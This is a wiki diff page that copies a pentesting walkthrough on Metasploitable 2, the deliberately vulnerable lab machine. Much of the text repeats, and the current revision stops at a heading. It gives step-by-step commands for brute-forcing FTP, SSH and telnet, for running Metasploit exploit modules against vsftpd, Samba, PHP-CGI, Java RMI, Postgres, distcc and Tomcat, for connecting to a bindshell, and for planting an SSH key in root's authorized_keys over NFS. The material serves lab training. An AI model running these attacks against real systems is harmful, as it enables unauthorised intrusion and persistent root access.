Difference between revisions of "Metasploitable: Comprehensive Guide on Metasploitable 2"

From OnnoWiki
Jump to navigation Jump to search
(Created page with "Sumber: https://www.hackingarticles.in/comprehensive-guide-on-metasploitable-2/ If you’ve ever tried to learn about pentesting you would have come across Metasploitable in...")
 
Line 3: Line 3:
  
 
If you’ve ever tried to learn about pentesting you would have come across Metasploitable in one way or another. In this article, we will be exploiting all the services running in Metasploitable 2, so without further ado, let’s dive in.
 
If you’ve ever tried to learn about pentesting you would have come across Metasploitable in one way or another. In this article, we will be exploiting all the services running in Metasploitable 2, so without further ado, let’s dive in.
 +
 
Table of Content
 
Table of Content
  
Line 32: Line 33:
  
 
The first step towards doing what we want to achieve is a service scan that looks at all the 65535 ports of Metasploitable 2 to see what’s running where and with what version. You will notice the result in the image below.
 
The first step towards doing what we want to achieve is a service scan that looks at all the 65535 ports of Metasploitable 2 to see what’s running where and with what version. You will notice the result in the image below.
nmap -p- -sV 192.168.1.103
+
 
1
+
nmap -p- -sV 192.168.1.103
+
 
nmap -p- -sV 192.168.1.103
 
  
 
Exploiting Port 21: FTP
 
Exploiting Port 21: FTP
Line 42: Line 42:
  
 
Hydra shows us that we have 4 valid login ID’s and passwords.
 
Hydra shows us that we have 4 valid login ID’s and passwords.
hydra -L user.txt -P pass.txt 192.168.1.103 ftp
+
 
1
+
hydra -L user.txt -P pass.txt 192.168.1.103 ftp
 
hydra -L user.txt -P pass.txt 192.168.1.103 ftp
 
  
 
Let’s put our findings to use and try to connect using FTP.
 
Let’s put our findings to use and try to connect using FTP.
ftp 192.168.1.103
+
 
1
+
ftp 192.168.1.103
+
 
ftp 192.168.1.103
 
  
 
Exploiting VSFTPD 2.3.4
 
Exploiting VSFTPD 2.3.4
Line 64: Line 61:
  
 
This module exploits a malicious backdoor that was added to the VSFTPD download archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between June 30th, 2011 and July 1st, 2011 according to the most recent information available. This backdoor was removed on July 3rd, 2011.
 
This module exploits a malicious backdoor that was added to the VSFTPD download archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between June 30th, 2011 and July 1st, 2011 according to the most recent information available. This backdoor was removed on July 3rd, 2011.
msf > use exploit/unix/ftp/vsftpd_234_backdoor
+
 
msf exploit (unix/ftp/vsftpd_234_backdoor) > set rhost 192.168.1.103
+
msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit (unix/ftp/vsftpd_234_backdoor) > exploit
+
msf exploit (unix/ftp/vsftpd_234_backdoor) > set rhost 192.168.1.103
1
+
msf exploit (unix/ftp/vsftpd_234_backdoor) > exploit
2
 
3
 
 
msf > use exploit/unix/ftp/vsftpd_234_backdoor
 
msf exploit (unix/ftp/vsftpd_234_backdoor) > set rhost 192.168.1.103
 
msf exploit (unix/ftp/vsftpd_234_backdoor) > exploit
 
  
 
And as you can observe, we have owned the command shell of the remote machine.
 
And as you can observe, we have owned the command shell of the remote machine.
Line 82: Line 73:
  
 
This module will test ssh logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.
 
This module will test ssh logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.
msf > use auxiliary/scanner/ssh/ssh_login
+
 
msf auxiliary (scanner/ssh/ssh_login) > set rhosts 192.168.1.103
+
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary (scanner/ssh/ssh_login) > set user_file /root/Desktop/user.txt
+
msf auxiliary (scanner/ssh/ssh_login) > set rhosts 192.168.1.103
msf auxiliary (scanner/ssh/ssh_login) > set pass_file /root/Desktop/pass.txt
+
msf auxiliary (scanner/ssh/ssh_login) > set user_file /root/Desktop/user.txt
msf auxiliary (scanner/ssh/ssh_login) > exploit
+
msf auxiliary (scanner/ssh/ssh_login) > set pass_file /root/Desktop/pass.txt
1
+
msf auxiliary (scanner/ssh/ssh_login) > exploit
2
+
 
3
 
4
 
5
 
 
msf > use auxiliary/scanner/ssh/ssh_login
 
msf auxiliary (scanner/ssh/ssh_login) > set rhosts 192.168.1.103
 
msf auxiliary (scanner/ssh/ssh_login) > set user_file /root/Desktop/user.txt
 
msf auxiliary (scanner/ssh/ssh_login) > set pass_file /root/Desktop/pass.txt
 
msf auxiliary (scanner/ssh/ssh_login) > exploit
 
  
 
And as you can observe, again we have owned the command shell of the remote machine.
 
And as you can observe, again we have owned the command shell of the remote machine.
Line 104: Line 86:
  
 
This time we will brute-force the SSH service using a 5720.py. exploit. The exploit comes with RSA keys that it used to bruteforce the root login. We will basically be running the exploit by giving it the path to the RSA keys we want to use and the IP of the target machine. Here’s how it works.
 
This time we will brute-force the SSH service using a 5720.py. exploit. The exploit comes with RSA keys that it used to bruteforce the root login. We will basically be running the exploit by giving it the path to the RSA keys we want to use and the IP of the target machine. Here’s how it works.
python 5720.py 5622/rsa/2048/ 192.168.1.103 root
 
1
 
 
python 5720.py 5622/rsa/2048/ 192.168.1.103 root
 
  
   
+
  python 5720.py 5622/rsa/2048/ 192.168.1.103 root
 +
 
  
 
Success! It finds the right key pretty quick and gives the exact command to execute to get a successful connection.
 
Success! It finds the right key pretty quick and gives the exact command to execute to get a successful connection.
Line 116: Line 95:
  
 
We are using Wireshark to capture the TCP traffic, it is set to run in the background while we connect to Metasploitable 2 through telnet using “msfadmin” as credentials for user name and password.
 
We are using Wireshark to capture the TCP traffic, it is set to run in the background while we connect to Metasploitable 2 through telnet using “msfadmin” as credentials for user name and password.
telnet 192.168.1.103
+
 
1
+
telnet 192.168.1.103
 
telnet 192.168.1.103
 
  
 
Once successfully connected we go back to Wireshark. Now we click the “TCP Stream” option under Analyze > Follow. This shows us the login credentials in plain text.
 
Once successfully connected we go back to Wireshark. Now we click the “TCP Stream” option under Analyze > Follow. This shows us the login credentials in plain text.
Line 126: Line 103:
  
 
This module will test a telnet login on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access. The same password and user file from earlier will be used for this.
 
This module will test a telnet login on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access. The same password and user file from earlier will be used for this.
msf > use auxiliary/scanner/telnet/telnet_login
+
 
msf auxiliary (scanner/telnet/telnet_login) > set rhosts 192.168.1.103
+
msf > use auxiliary/scanner/telnet/telnet_login
msf auxiliary (scanner/telnet/telnet_login) > set user_file /root/Desktop/user.txt
+
msf auxiliary (scanner/telnet/telnet_login) > set rhosts 192.168.1.103
msf auxiliary (scanner/telnet/telnet_login) > set pass_file /root/Desktop/pass.txt
+
msf auxiliary (scanner/telnet/telnet_login) > set user_file /root/Desktop/user.txt
msf auxiliary (scanner/telnet/telnet_login) > set stop_on_success true
+
msf auxiliary (scanner/telnet/telnet_login) > set pass_file /root/Desktop/pass.txt
msf auxiliary (scanner/telnet/telnet_login) > exploit
+
msf auxiliary (scanner/telnet/telnet_login) > set stop_on_success true
1
+
msf auxiliary (scanner/telnet/telnet_login) > exploit
2
 
3
 
4
 
5
 
6
 
 
msf > use auxiliary/scanner/telnet/telnet_login
 
msf auxiliary (scanner/telnet/telnet_login) > set rhosts 192.168.1.103
 
msf auxiliary (scanner/telnet/telnet_login) > set user_file /root/Desktop/user.txt
 
msf auxiliary (scanner/telnet/telnet_login) > set pass_file /root/Desktop/pass.txt
 
msf auxiliary (scanner/telnet/telnet_login) > set stop_on_success true
 
msf auxiliary (scanner/telnet/telnet_login) > exploit
 
  
 
Port 25 SMTP User Enumeration
 
Port 25 SMTP User Enumeration
Line 151: Line 116:
  
 
We will see that the tool lets us know which all usernames exist that I have saved in my user.txt file.
 
We will see that the tool lets us know which all usernames exist that I have saved in my user.txt file.
smtp-user-enum -M VRFY -U user.txt -t 192.168.1.103
+
 
1
+
smtp-user-enum -M VRFY -U user.txt -t 192.168.1.103
 
smtp-user-enum -M VRFY -U user.txt -t 192.168.1.103
 
  
 
Exploiting Port 80 (PHP_CGI)
 
Exploiting Port 80 (PHP_CGI)
Line 161: Line 124:
  
 
When running as a CGI, PHP up to version 5.3.12 and 5.4.2 is vulnerable to an argument injection vulnerability. This module takes advantage of the -d flag to set php.ini directives to achieve code execution. From the advisory: “if there is NO unescaped ‘=’ in the query string, the string is split on ‘+’ (encoded space) characters, url decoded, passed to a function that escapes shell metacharacters (the “encoded in a system-defined manner” from the RFC) and then passes them to the CGI binary.” This module can also be used to exploit the Plesk 0day disclosed by kingcope and exploited in the wild in June 2013.
 
When running as a CGI, PHP up to version 5.3.12 and 5.4.2 is vulnerable to an argument injection vulnerability. This module takes advantage of the -d flag to set php.ini directives to achieve code execution. From the advisory: “if there is NO unescaped ‘=’ in the query string, the string is split on ‘+’ (encoded space) characters, url decoded, passed to a function that escapes shell metacharacters (the “encoded in a system-defined manner” from the RFC) and then passes them to the CGI binary.” This module can also be used to exploit the Plesk 0day disclosed by kingcope and exploited in the wild in June 2013.
msf > use exploit/multi/http/php_arg_injection
+
 
msf exploit (multi/http/php_arg_injection) > set rhost 192.168.1.103
+
msf > use exploit/multi/http/php_arg_injection
msf exploit (multi/http/php_arg_injection) > exploit
+
msf exploit (multi/http/php_arg_injection) > set rhost 192.168.1.103
1
+
msf exploit (multi/http/php_arg_injection) > exploit
2
 
3
 
 
msf > use exploit/multi/http/php_arg_injection
 
msf exploit (multi/http/php_arg_injection) > set rhost 192.168.1.103
 
msf exploit (multi/http/php_arg_injection) > exploit
 
  
 
Exploiting Port 139 & 445 (Samba)
 
Exploiting Port 139 & 445 (Samba)
  
 
Samba is running on both port 139 and 445, we will be exploiting it using Metasploit. The default port for this exploit is set to port 139 but it can be changed to port 445 as well.
 
Samba is running on both port 139 and 445, we will be exploiting it using Metasploit. The default port for this exploit is set to port 139 but it can be changed to port 445 as well.
msf > use exploit/multi/samba/usermap_script
+
 
msf exploit (multi/samba/usermap_script) > set rhost 192.168.1.103
+
msf > use exploit/multi/samba/usermap_script
msf exploit (multi/samba/usermap_script) > exploit
+
msf exploit (multi/samba/usermap_script) > set rhost 192.168.1.103
1
+
msf exploit (multi/samba/usermap_script) > exploit
2
 
3
 
 
msf > use exploit/multi/samba/usermap_script
 
msf exploit (multi/samba/usermap_script) > set rhost 192.168.1.103
 
msf exploit (multi/samba/usermap_script) > exploit
 
  
 
Exploiting Port 8080 (Java)
 
Exploiting Port 8080 (Java)
Line 191: Line 142:
  
 
We will be using the Remote Method Invocation exploit on the Java service running on port 8080. It’s quite straight forward, just choose the exploit, set the target machine IP and that’s it.
 
We will be using the Remote Method Invocation exploit on the Java service running on port 8080. It’s quite straight forward, just choose the exploit, set the target machine IP and that’s it.
msf > use exploit/multi/misc/java_rmi_server
+
 
msf exploit(multi/misc/java_rmi_server) > set rhost 192.168.1.103
+
msf > use exploit/multi/misc/java_rmi_server
msf exploit(multi/misc/java_rmi_server) > exploit
+
msf exploit(multi/misc/java_rmi_server) > set rhost 192.168.1.103
1
+
msf exploit(multi/misc/java_rmi_server) > exploit
2
 
3
 
 
msf > use exploit/multi/misc/java_rmi_server
 
msf exploit(multi/misc/java_rmi_server) > set rhost 192.168.1.103
 
msf exploit(multi/misc/java_rmi_server) > exploit
 
  
 
Exploiting Port 5432 (Postgres)
 
Exploiting Port 5432 (Postgres)
Line 207: Line 152:
  
 
On some default Linux installations of PostgreSQL, the Postgres service account may write to the /tmp directory and may source UDF Shared Libraries from there as well, allowing execution of arbitrary code. This module compiles a Linux shared object file, uploads it to the target host via the UPDATE pg_largeobject method of binary injection, and creates a UDF (user defined function) from that shared object. Because the payload is run as the shared object’s constructor, it does not need to conform to specific Postgres API versions.
 
On some default Linux installations of PostgreSQL, the Postgres service account may write to the /tmp directory and may source UDF Shared Libraries from there as well, allowing execution of arbitrary code. This module compiles a Linux shared object file, uploads it to the target host via the UPDATE pg_largeobject method of binary injection, and creates a UDF (user defined function) from that shared object. Because the payload is run as the shared object’s constructor, it does not need to conform to specific Postgres API versions.
msf > use exploit/linux/postgres/postgres_payload
+
 
msf exploit (linux/postgres/postgres_payload) > set rhost 192.168.1.103
+
msf > use exploit/linux/postgres/postgres_payload
msf exploit (linux/postgres/postgres_payload) > exploit
+
msf exploit (linux/postgres/postgres_payload) > set rhost 192.168.1.103
1
+
msf exploit (linux/postgres/postgres_payload) > exploit
2
 
3
 
 
msf > use exploit/linux/postgres/postgres_payload
 
msf exploit (linux/postgres/postgres_payload) > set rhost 192.168.1.103
 
msf exploit (linux/postgres/postgres_payload) > exploit
 
  
 
Exploiting Port 6667 (UnrealIRCD)
 
Exploiting Port 6667 (UnrealIRCD)
Line 223: Line 162:
  
 
This module exploits a malicious backdoor that was added to the Unreal IRCD 3.2.8.1 download archive. This backdoor was present in the Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th, 2010.
 
This module exploits a malicious backdoor that was added to the Unreal IRCD 3.2.8.1 download archive. This backdoor was present in the Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th, 2010.
msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
+
 
msf exploit (unix/irc/unreal_ircd_3281_backdoor) > set rhost 192.168.1.103
+
msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf exploit (unix/irc/unreal_ircd_3281_backdoor) > exploit
+
msf exploit (unix/irc/unreal_ircd_3281_backdoor) > set rhost 192.168.1.103
1
+
msf exploit (unix/irc/unreal_ircd_3281_backdoor) > exploit
2
 
3
 
 
msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
 
msf exploit (unix/irc/unreal_ircd_3281_backdoor) > set rhost 192.168.1.103
 
msf exploit (unix/irc/unreal_ircd_3281_backdoor) > exploit
 
  
 
Exploiting Port 36255
 
Exploiting Port 36255
  
 
This is a weakness that allows arbitrary commands on systems running distccd. We will be using Distcc Daemon Command Execution. This module uses a documented security weakness to execute arbitrary commands on any system running distccd.
 
This is a weakness that allows arbitrary commands on systems running distccd. We will be using Distcc Daemon Command Execution. This module uses a documented security weakness to execute arbitrary commands on any system running distccd.
msf > use exploit/unix/misc/distcc_exec
+
 
msf exploit (unix/misc/distcc_exec) > set rhost 192.168.1.103
+
msf > use exploit/unix/misc/distcc_exec
msf exploit (unix/misc/distcc_exec) > exploit
+
msf exploit (unix/misc/distcc_exec) > set rhost 192.168.1.103
1
+
msf exploit (unix/misc/distcc_exec) > exploit
2
 
3
 
 
msf > use exploit/unix/misc/distcc_exec
 
msf exploit (unix/misc/distcc_exec) > set rhost 192.168.1.103
 
msf exploit (unix/misc/distcc_exec) > exploit
 
  
 
Remote Login Exploitation
 
Remote Login Exploitation
  
 
A remote login is a tool that was used before ssh came into the picture. Since we have the login credentials for Metasploitable 2, we will be using Rlogin to connect to it, using the “-l” flag to define the login name.
 
A remote login is a tool that was used before ssh came into the picture. Since we have the login credentials for Metasploitable 2, we will be using Rlogin to connect to it, using the “-l” flag to define the login name.
rlogin -l msfadmin 192.168.1.103
+
 
1
+
rlogin -l msfadmin 192.168.1.103
 
rlogin -l msfadmin 192.168.1.103
 
  
 
Metasploit has a module in its auxiliary section that we can use to get into the rlogin.
 
Metasploit has a module in its auxiliary section that we can use to get into the rlogin.
msf > use auxiliary/scanner/rservices/rlogin_login
+
 
msf auxiliary (scanner/rservices/rlogin_login) > set rhosts 192.168.1.103
+
msf > use auxiliary/scanner/rservices/rlogin_login
msf auxiliary (scanner/rservices/rlogin_login) > set username root
+
msf auxiliary (scanner/rservices/rlogin_login) > set rhosts 192.168.1.103
msf auxiliary (scanner/rservices/rlogin_login) > exploit
+
msf auxiliary (scanner/rservices/rlogin_login) > set username root
1
+
msf auxiliary (scanner/rservices/rlogin_login) > exploit
2
 
3
 
4
 
 
msf > use auxiliary/scanner/rservices/rlogin_login
 
msf auxiliary (scanner/rservices/rlogin_login) > set rhosts 192.168.1.103
 
msf auxiliary (scanner/rservices/rlogin_login) > set username root
 
msf auxiliary (scanner/rservices/rlogin_login) > exploit
 
  
 
Remote Shell Exploitation
 
Remote Shell Exploitation
  
 
Remote shell Protocol is another way to gain a remote shell, it is a legitimate service that we will use to access the target machine with login credentials to run a certain command.
 
Remote shell Protocol is another way to gain a remote shell, it is a legitimate service that we will use to access the target machine with login credentials to run a certain command.
rsh -l msfadmin 192.168.1.103 ifconfig
+
 
1
+
rsh -l msfadmin 192.168.1.103 ifconfig
 
rsh -l msfadmin 192.168.1.103 ifconfig
 
  
 
Exploiting Distributed Ruby Remote Code Execution (8787)
 
Exploiting Distributed Ruby Remote Code Execution (8787)
Line 284: Line 199:
  
 
This module exploits remote code execution vulnerabilities in dRuby.
 
This module exploits remote code execution vulnerabilities in dRuby.
msf > use exploit/linux/misc/drb_remote_codeexec
+
 
msf exploit (linux/misc/drb_remote_code) > set rhost 192.168.1.103
+
msf > use exploit/linux/misc/drb_remote_codeexec
msf exploit (linux/misc/drb_remote_code) > exploit
+
msf exploit (linux/misc/drb_remote_code) > set rhost 192.168.1.103
1
+
msf exploit (linux/misc/drb_remote_code) > exploit
2
 
3
 
 
msf > use exploit/linux/misc/drb_remote_codeexec
 
msf exploit (linux/misc/drb_remote_code) > set rhost 192.168.1.103
 
msf exploit (linux/misc/drb_remote_code) > exploit
 
  
 
Bindshell Exploitation
 
Bindshell Exploitation
  
 
Metasploitable 2 comes with an open bindshell service running on port 1524. We will be using Netcat to connect to it.
 
Metasploitable 2 comes with an open bindshell service running on port 1524. We will be using Netcat to connect to it.
nc 192.168.1.103 1524
+
 
1
+
nc 192.168.1.103 1524
+
 
nc 192.168.1.103 1524
 
  
 
Exploiting Port 5900 (VNC)
 
Exploiting Port 5900 (VNC)
Line 308: Line 216:
  
 
This module will test a VNC server on a range of machines and report successful logins. Currently, it supports RFB protocol version 3.3, 3.7, 3.8 and 4.001 using the VNC challenge-response authentication method.
 
This module will test a VNC server on a range of machines and report successful logins. Currently, it supports RFB protocol version 3.3, 3.7, 3.8 and 4.001 using the VNC challenge-response authentication method.
msf > use auxiliary/scanner/vnc/vnc_login
+
 
msf auxiliary (scanner/vnc/vnc_login) > set login 192.168.1.103
+
msf > use auxiliary/scanner/vnc/vnc_login
msf auxiliary (scanner/vnc/vnc_login) > exploit
+
msf auxiliary (scanner/vnc/vnc_login) > set login 192.168.1.103
1
+
msf auxiliary (scanner/vnc/vnc_login) > exploit
2
 
3
 
 
msf > use auxiliary/scanner/vnc/vnc_login
 
msf auxiliary (scanner/vnc/vnc_login) > set login 192.168.1.103
 
msf auxiliary (scanner/vnc/vnc_login) > exploit
 
  
 
Let’s put what we’ve found to the test by connecting using the vncviewer
 
Let’s put what we’ve found to the test by connecting using the vncviewer
vncviewer 192.168.1.103
+
 
1
+
vncviewer 192.168.1.103
 
vncviewer 192.168.1.103
 
  
 
The credentials work and we have a remote desktop session that pops up in Kali.
 
The credentials work and we have a remote desktop session that pops up in Kali.
Line 330: Line 230:
  
 
We will connect to the target machine using Telnet running on port 2121 using the default credentials for Metasplotable 2.
 
We will connect to the target machine using Telnet running on port 2121 using the default credentials for Metasplotable 2.
telnet 192.168.1.103 2121
+
 
1
+
telnet 192.168.1.103 2121
 
telnet 192.168.1.103 2121
 
  
 
Exploiting Port 8180 (Apache Tomcat)
 
Exploiting Port 8180 (Apache Tomcat)
Line 340: Line 238:
  
 
This module can be used to execute a payload on Apache Tomcat servers that have an exposed “manager” application. The payload is uploaded as a WAR archive containing a JSP application using a POST request against the /manager/html/upload component. NOTE: The compatible payload sets vary based on the selected target. For example, you must select the Windows target to use native Windows payloads.
 
This module can be used to execute a payload on Apache Tomcat servers that have an exposed “manager” application. The payload is uploaded as a WAR archive containing a JSP application using a POST request against the /manager/html/upload component. NOTE: The compatible payload sets vary based on the selected target. For example, you must select the Windows target to use native Windows payloads.
msf > use exploit/multi/http/tomcat_mgr_upload
+
 
msf exploit (multi/http/tomcat_mgr_upload) > set rhost 192.168.1.103
+
msf > use exploit/multi/http/tomcat_mgr_upload
msf exploit (multi/http/tomcat_mgr_upload) > set rpost 8108
+
msf exploit (multi/http/tomcat_mgr_upload) > set rhost 192.168.1.103
msf exploit (multi/http/tomcat_mgr_upload) > set httpusername tomcat
+
msf exploit (multi/http/tomcat_mgr_upload) > set rpost 8108
msf exploit (multi/http/tomcat_mgr_upload) > set httppassword tomcat
+
msf exploit (multi/http/tomcat_mgr_upload) > set httpusername tomcat
msf exploit (multi/http/tomcat_mgr_upload) > exploit
+
msf exploit (multi/http/tomcat_mgr_upload) > set httppassword tomcat
1
+
msf exploit (multi/http/tomcat_mgr_upload) > exploit
2
 
3
 
4
 
5
 
6
 
 
msf > use exploit/multi/http/tomcat_mgr_upload
 
msf exploit (multi/http/tomcat_mgr_upload) > set rhost 192.168.1.103
 
msf exploit (multi/http/tomcat_mgr_upload) > set rpost 8108
 
msf exploit (multi/http/tomcat_mgr_upload) > set httpusername tomcat
 
msf exploit (multi/http/tomcat_mgr_upload) > set httppassword tomcat
 
msf exploit (multi/http/tomcat_mgr_upload) > exploit
 
  
 
Privilege Escalation via Port 2049: NFS
 
Privilege Escalation via Port 2049: NFS
Line 369: Line 255:
  
 
The key is now copied so we unmount the directory and connect as the root user using ssh.
 
The key is now copied so we unmount the directory and connect as the root user using ssh.
showmount -e 192.168.1.103
+
 
ssh-keygen
+
showmount -e 192.168.1.103
mkdir /tmp/sshkey
+
ssh-keygen
mount -t nfs 192.168.1.103:/ /tmp/sshkey/
+
mkdir /tmp/sshkey
cat ~/ .ssh/id_rsa.pub >>/tmp/sshkey/root/.ssh/authorized_keys
+
mount -t nfs 192.168.1.103:/ /tmp/sshkey/
umount /tmp/sshkey
+
cat ~/ .ssh/id_rsa.pub >>/tmp/sshkey/root/.ssh/authorized_keys
ssh root@192.168.1.103
+
umount /tmp/sshkey
1
+
ssh root@192.168.1.103
2
 
3
 
4
 
5
 
6
 
7
 
 
showmount -e 192.168.1.103
 
ssh-keygen
 
mkdir /tmp/sshkey
 
mount -t nfs 192.168.1.103:/ /tmp/sshkey/
 
cat ~/ .ssh/id_rsa.pub >>/tmp/sshkey/root/.ssh/authorized_keys
 
umount /tmp/sshkey
 
ssh root@192.168.1.103
 
  
 
Exploiting Port 3306 (MYSQL)
 
Exploiting Port 3306 (MYSQL)
  
 
The MySQL database in Metasploitable 2 has negligible security, we will connect to it using the MySQL function of Kali by defining the username and host IP. The password will be left blank.
 
The MySQL database in Metasploitable 2 has negligible security, we will connect to it using the MySQL function of Kali by defining the username and host IP. The password will be left blank.
mysql -u root -h 192.168.1.103 -p
+
 
1
+
mysql -u root -h 192.168.1.103 -p
 
mysql -u root -h 192.168.1.103 -p
 
  
 
This article is a gateway into the world of pentesting. Its intent is to give you a single source containing all the ways and means to exploit all the vulnerabilities of Metasploiable 2 classified by port’s and services, it doesn’t get any better than this.
 
This article is a gateway into the world of pentesting. Its intent is to give you a single source containing all the ways and means to exploit all the vulnerabilities of Metasploiable 2 classified by port’s and services, it doesn’t get any better than this.

Revision as of 05:08, 20 February 2020

Sumber: https://www.hackingarticles.in/comprehensive-guide-on-metasploitable-2/


If you’ve ever tried to learn about pentesting you would have come across Metasploitable in one way or another. In this article, we will be exploiting all the services running in Metasploitable 2, so without further ado, let’s dive in.

Table of Content

   Network Scan
   Exploiting Port 21 FTP (Hydra)
   Exploiting VSFTPD 2.3.4
   Exploiting Port 22 SSH
   Bruteforce Port 22 SSH (RSA Method)
   Exploiting port 23 TELNET (Credential Capture)
   Exploiting TELNET (Bruteforce)
   Port 25 SMTP User Enumeration
   Exploiting Port 80 (PHP)
   Exploiting Port 139 & 445 (Samba)
   Exploiting Port 8080 (Java)
   Exploiting Port 5432 (Postgres)
   Exploiting Port 6667 (UnrealIRCD)
   Exploiting Port 36255
   Remote Login Exploitation
   Remote Shell Exploitation
   Exploiting Port 8787
   Bindshell
   Exploiting Port 5900 (VNC)
   Access Port 2121 (ProFTPD)
   Exploiting Port 8180 (Apache Tomcat)
   Privilege Escalation via NFS
   Exploiting Port 3306 (MYSQL)

Network Scan

The first step towards doing what we want to achieve is a service scan that looks at all the 65535 ports of Metasploitable 2 to see what’s running where and with what version. You will notice the result in the image below.

nmap -p- -sV 192.168.1.103


Exploiting Port 21: FTP

We have all our ports and services listed now, let’s start by Exploiting port 21 running FTP. We will be using Hydra for this. The two wordlists for this operation will have default login names and passwords.

Hydra shows us that we have 4 valid login ID’s and passwords.

hydra -L user.txt -P pass.txt 192.168.1.103 ftp

Let’s put our findings to use and try to connect using FTP.

ftp 192.168.1.103


Exploiting VSFTPD 2.3.4

We have exploited the service running on port 21, now we will exploit the particular version of the FTP service. We will be searching for an exploit for VSFTPD 2.3.4 using Searchsploit. searchsploit vsftpd 1

searchsploit vsftpd

We now have our exploit, let’s get into Metasploit and run it.

This module exploits a malicious backdoor that was added to the VSFTPD download archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between June 30th, 2011 and July 1st, 2011 according to the most recent information available. This backdoor was removed on July 3rd, 2011.

msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit (unix/ftp/vsftpd_234_backdoor) > set rhost 192.168.1.103
msf exploit (unix/ftp/vsftpd_234_backdoor) > exploit

And as you can observe, we have owned the command shell of the remote machine.

Exploiting Port 22 SSH

Metasploit has an auxiliary function that we will use on the SSH service running on port 22. One we get our session through it we will be upgrading it to Meterpreter.

This module will test ssh logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.

msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary (scanner/ssh/ssh_login) > set rhosts 192.168.1.103
msf auxiliary (scanner/ssh/ssh_login) > set user_file /root/Desktop/user.txt
msf auxiliary (scanner/ssh/ssh_login) > set pass_file /root/Desktop/pass.txt
msf auxiliary (scanner/ssh/ssh_login) > exploit


And as you can observe, again we have owned the command shell of the remote machine.

Bruteforce Port 22 SSH (RSA Method)

This time we will brute-force the SSH service using a 5720.py. exploit. The exploit comes with RSA keys that it used to bruteforce the root login. We will basically be running the exploit by giving it the path to the RSA keys we want to use and the IP of the target machine. Here’s how it works.

python 5720.py 5622/rsa/2048/ 192.168.1.103 root


Success! It finds the right key pretty quick and gives the exact command to execute to get a successful connection.

Exploiting port 23 TELNET (Credential Capture)

We are using Wireshark to capture the TCP traffic, it is set to run in the background while we connect to Metasploitable 2 through telnet using “msfadmin” as credentials for user name and password.

telnet 192.168.1.103

Once successfully connected we go back to Wireshark. Now we click the “TCP Stream” option under Analyze > Follow. This shows us the login credentials in plain text.

Exploiting TELNET

This module will test a telnet login on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access. The same password and user file from earlier will be used for this.

msf > use auxiliary/scanner/telnet/telnet_login
msf auxiliary (scanner/telnet/telnet_login) > set rhosts 192.168.1.103
msf auxiliary (scanner/telnet/telnet_login) > set user_file /root/Desktop/user.txt
msf auxiliary (scanner/telnet/telnet_login) > set pass_file /root/Desktop/pass.txt
msf auxiliary (scanner/telnet/telnet_login) > set stop_on_success true
msf auxiliary (scanner/telnet/telnet_login) > exploit

Port 25 SMTP User Enumeration

Kali comes with a tool called “Smtp-User-Enum”, it has multiple modes that deal with different facets of SMTP, we will be using it to verify which SMTP usernames exist in victim machine.

We will see that the tool lets us know which all usernames exist that I have saved in my user.txt file.

smtp-user-enum -M VRFY -U user.txt -t 192.168.1.103

Exploiting Port 80 (PHP_CGI)

We know that port 80 is open so we type in the IP address of Metasploitable 2 in our browser and notice that it is running PHP. We dig a little further and find which version of PHP is running and also that it is being run as a CGI. We will now exploit the argument injection vulnerability of PHP 2.4.2 using Metasploit.

When running as a CGI, PHP up to version 5.3.12 and 5.4.2 is vulnerable to an argument injection vulnerability. This module takes advantage of the -d flag to set php.ini directives to achieve code execution. From the advisory: “if there is NO unescaped ‘=’ in the query string, the string is split on ‘+’ (encoded space) characters, url decoded, passed to a function that escapes shell metacharacters (the “encoded in a system-defined manner” from the RFC) and then passes them to the CGI binary.” This module can also be used to exploit the Plesk 0day disclosed by kingcope and exploited in the wild in June 2013.

msf > use exploit/multi/http/php_arg_injection
msf exploit (multi/http/php_arg_injection) > set rhost 192.168.1.103
msf exploit (multi/http/php_arg_injection) > exploit

Exploiting Port 139 & 445 (Samba)

Samba is running on both port 139 and 445, we will be exploiting it using Metasploit. The default port for this exploit is set to port 139 but it can be changed to port 445 as well.

msf > use exploit/multi/samba/usermap_script
msf exploit (multi/samba/usermap_script) > set rhost 192.168.1.103
msf exploit (multi/samba/usermap_script) > exploit

Exploiting Port 8080 (Java)

This module takes advantage of the default configuration of the RMI Registry and RMI Activation services, which allow loading classes from any remote (HTTP) URL. As it invokes a method in the RMI Distributed Garbage Collector which is available via every RMI endpoint, it can be used against both rmiregistry and rmid, and against most other (custom) RMI endpoints as well. Note that it does not work against Java Management Extension (JMX) ports since those do not support remote class loading unless another RMI endpoint is active in the same Java process. RMI method calls do not support or require any sort of authentication.

We will be using the Remote Method Invocation exploit on the Java service running on port 8080. It’s quite straight forward, just choose the exploit, set the target machine IP and that’s it.

msf > use exploit/multi/misc/java_rmi_server
msf exploit(multi/misc/java_rmi_server) > set rhost 192.168.1.103
msf exploit(multi/misc/java_rmi_server) > exploit

Exploiting Port 5432 (Postgres)

Postgres is associated with SQL is runs on port 5432 and we have a great little exploit that can be used here.

On some default Linux installations of PostgreSQL, the Postgres service account may write to the /tmp directory and may source UDF Shared Libraries from there as well, allowing execution of arbitrary code. This module compiles a Linux shared object file, uploads it to the target host via the UPDATE pg_largeobject method of binary injection, and creates a UDF (user defined function) from that shared object. Because the payload is run as the shared object’s constructor, it does not need to conform to specific Postgres API versions.

msf > use exploit/linux/postgres/postgres_payload
msf exploit (linux/postgres/postgres_payload) > set rhost 192.168.1.103
msf exploit (linux/postgres/postgres_payload) > exploit

Exploiting Port 6667 (UnrealIRCD)

